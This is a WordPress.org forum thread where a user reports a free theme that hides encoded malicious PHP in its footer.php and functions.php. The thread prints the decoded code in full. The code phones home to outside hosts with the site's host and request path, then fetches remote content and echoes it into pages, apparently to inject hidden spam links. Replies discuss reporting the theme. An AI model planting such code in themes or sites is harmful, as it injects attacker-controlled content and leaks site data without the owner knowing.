WordPress.org

Ready to get started?Download WordPress

Forums

Malware in themes (5 posts)

  1. iandoug
    Member
    Posted 5 years ago #

    Hi

    So I'm testing a new theme for a client. "Surf Passion".
    Theme loads slow.

    Accidentally discover nasty stuff in the footer.php, and even more in functions.php.

    The nasty stuff is gzinflated/rot13/base64-encoded php code.

    The footer has this:

    error_reporting(0);
    $CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);

    if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
    echo @file_get_contents($CodeURL);
    } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
    $content = @file($CodeURL);
    echo @join("", $content);
    } elseif (function_exists("curl_init")) {
    $ch = curl_init($CodeURL);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
    }

    which appears to stick invisible links into footers, presumably to get some pagerank.

    functions.php requires 40 levels of decryption to produce this:

    <?php

    if ( function_exists('register_sidebars') )
    register_sidebars(2,array(
    'before_widget' => '',
    'after_widget' => '',
    'before_title' => '<h2>',
    'after_title' => '</h2>',
    ));

    function wp_lk()
    {
    $loc = urlencode($_SERVER['HTTP_HOST']);
    $lname = "www.project-theme.com";
    $file="pages/$loc.txt";
    $carnivore="/wp_stat.php?loc=$loc";

    $test=ini_get('allow_url_fopen');
    if ($test==0 || $test="" || $test=="off")
    {
    $fps = @fsockopen($lname, 80, $errno, $errstr, 30);
    if($fps)
    {
    $out = "POST $carnivore HTTP/1.1\r\n";
    $out .= "Host: $lname\r\n";
    $out .= "Connection: Close\r\n\r\n";
    @fwrite($fps, $out);
    @fclose($fps);
    }
    }
    else
    {
    @file_get_contents("http://" .$lname .$carnivore);
    }

    if ($test==0 || $test="" || $test=="off")
    {
    $code = @file_get_contents("http://" .$lname ."/" .$file);
    }
    else
    {
    $fp = @fsockopen($lname, '80', $err_no, $err_str, 30);
    if ($fp)
    {
    @stream_set_timeout($fp, 60);

    @fwrite($fp, "GET /$file HTTP/1.1\r\n");
    @fwrite($fp, "Host: $lname\r\n");
    @fwrite($fp, "Connection: Close\r\n\r\n");

    $code = "";

    while(!feof($fp))
    {
    $code .= @fgets($fp, 1024);
    }

    $code = trim(strstr($code, "\r\n\r\n"));
    }

    @fclose($fp);
    }

    if ( is_string($code) )
    echo($code);
    }

    ?>

    I can't find any calls to wp_lk() in the code, maybe it's hidden somewhere...

    Questions:

    1. any one know what the code in functions.php does?

    2. is there a place where users can identify themes as containing malware, so that they are blacklisted?

    thanks, Ian

  2. Samuel B
    moderator
    Posted 5 years ago #

    Personally, I think we should have a section dealing with these type of themes. Any time some one finds obfuscated code in a theme - list it here and warn people to beware of it.
    Maybe authors would get tired of seeing their crappy themes listed here and stop making them.
    My .02

    note - most of these themes are done this way to simply get google juice but could easily hide some nasties

  3. chaoskaizer
    Member
    Posted 5 years ago #

    2. You could try submit the offending website at http://badwarebusters.org/main/ask (safe browsing network).

  4. whooami
    Member
    Posted 5 years ago #

    that looks like it phoones home to here..

    http://www.project-theme.com/wp_stat.php?loc=my-house-asshole

    it also grabs a file ..

    interested in knowing how many domains this crap has run?

    http://www.project-theme.com/pages/

  5. whooami
    Member
    Posted 5 years ago #

    whats interesting is that this could be reversed. i would never support any kind of denial of service attacks, but I suppose anything is possible.

    i ran this from the command line, it outputs a page very similar to the front of that site. I didnt look especially close but it's either it, or very very close.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.